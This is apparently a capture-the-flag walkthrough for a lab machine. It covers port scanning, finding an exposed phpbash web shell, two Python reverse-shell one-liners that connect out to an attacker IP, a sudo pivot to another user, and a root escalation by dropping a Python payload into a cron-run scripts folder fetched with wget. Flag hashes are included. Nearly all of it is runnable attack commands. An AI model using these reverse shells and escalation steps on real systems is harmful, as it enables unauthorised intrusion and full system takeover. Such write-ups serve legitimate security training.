Information Gathering
IP Address | Opening Ports |
---|---|
10.10.10.68 | TCP:80 |
$ sudo masscan -p1-65535,U:1-65535 10.10.10.68 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.10.68
bash
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
PHP Bash
$ dirsearch -u http://10.10.10.68
http://10.10.10.68/dev/
http://10.10.10.68/dev/phpbash.php
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.16",445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
User.txt
8f7df2f47989e214ab11a888ee378946
www-data to scriptmanager
$ sudo -l
$ sudo -u scriptmanager ./reverse.sh
Privilege Escalation : Python cron jobs
$ ./pspy32
$ cd /scripts;touch 1.py
python
import os,pty,socket;s=socket.socket();s.connect(("10.10.16.16",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")
$ wget http://10.10.16.16/reverse.py
Root.txt
96c6dadfc0c09eb783c4d2e614205ef9